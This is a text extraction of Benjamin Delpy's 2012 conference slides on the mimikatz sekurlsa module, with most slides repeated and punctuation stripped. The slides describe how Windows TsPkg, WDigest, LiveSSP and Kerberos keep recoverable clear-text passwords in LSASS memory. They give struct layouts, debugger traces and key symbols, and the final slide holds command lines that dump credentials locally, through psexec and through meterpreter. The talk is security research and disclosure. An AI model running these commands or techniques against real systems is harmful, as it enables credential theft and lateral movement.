Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
